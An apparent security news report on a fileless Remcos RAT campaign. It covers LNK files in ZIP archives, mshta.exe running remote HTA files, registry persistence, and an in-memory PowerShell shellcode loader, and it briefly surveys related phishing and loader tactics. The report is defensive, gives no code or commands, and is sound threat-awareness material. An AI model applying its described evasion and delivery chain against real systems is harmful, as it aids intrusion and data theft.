Fileless Remcos RAT Deployment via LNK Files and MSHTA in PowerShell-Driven Cyber Attacks

Cybersecurity researchers have uncovered a new malware campaign utilizing a PowerShell-based shellcode loader for the deployment of a remote access trojan known as Remcos RAT.

According to a technical report by a leading security firm, threat actors have been distributing malicious LNK files contained within ZIP archives, often masquerading as Office documents. The attack chain exploits mshta.exe, a legitimate Microsoft utility, to facilitate proxy execution in the initial phase of the attack.

Recent attacks primarily employ tax-themed lures to coax users into opening a malicious ZIP archive. This archive contains a Windows shortcut (LNK) file that activates mshta.exe, which executes an obfuscated HTA file named “xlab22.hta” from a remote server. This HTA file incorporates Visual Basic Script code designed to download a PowerShell script, a decoy PDF, and a second HTA file similar to “xlab22.hta,” titled “311.hta.” Notably, “311.hta” is structured to modify the Windows Registry to ensure it is automatically launched at system startup.

Upon execution, the PowerShell script decrypts and reconstructs a shellcode loader that subsequently initializes the Remcos RAT payload entirely within memory.

Remcos RAT is a sophisticated malware solution that grants threat actors comprehensive control over compromised systems. Its modular architecture allows it to gather extensive system information, log keystrokes, capture screenshots, monitor clipboard activity, and list all installed programs and active processes.

Additionally, the malware establishes a TLS connection to a command-and-control (C2) server, thereby maintaining a persistent channel for data exfiltration and control.

Fileless variants of Remcos RAT have been previously identified. In late 2024, another security firm reported on a phishing campaign that utilized fileless techniques for deploying the malware via order-themed lures.

The attractiveness of this attack vector to cybercriminals lies in its ability to evade detection by many traditional security solutions, as the malicious code operates directly in the computer’s memory, leaving minimal traces on disk.

Experts in the field emphasize the implications of these developments, noting that PowerShell-based attacks signify an evolution in tactics used by threat actors to circumvent conventional security measures. The utilization of fileless malware enables execution directly in memory, utilizing LNK files and MSHTA.exe to carry out obfuscated PowerShell scripts capable of bypassing standard defenses.

To confront these evolving threats, advanced email security measures capable of detecting and blocking malicious LNK attachments before they reach users are critical. Furthermore, real-time monitoring of PowerShell commands for anomalies is essential to counteract the threat posed by this type of malware.

Recent disclosures align with findings from cybersecurity organizations regarding new threats, including a .NET loader used to deploy various malware, such as information stealers and RATs, including Agent Tesla and NovaStealer. This loader operates in three stages, deploying the main malware effectively and utilizing sophisticated techniques to evade detection.

The emergence of multiple phishing and social engineering campaigns designed for credential theft and malware distribution further complicates the threat landscape. Tactics employed include:

– Distributing trojanized versions of trusted software, such as KeePass, via typosquatted domains to deliver malicious payloads.
– Implementing phishing tactics involving ClickFix lures and embedded URLs in PDF documents to deploy additional malware.
– Using trojanized Microsoft Office documents to deliver various information stealers through malware distribution services.
– Exploiting blob URIs to redirect victims to phishing pages through legitimate-looking domains.

The rise of artificial intelligence (AI) in orchestrating sophisticated attacks has also drawn attention, with threat actors utilizing polymorphic techniques to evade detection by altering key elements of phishing campaigns in real-time.

As these threats continue to evolve and grow in complexity, it is imperative for cybersecurity frameworks to adapt beyond perimeter defenses, employing advanced detection capabilities that extend beyond initial email filtering.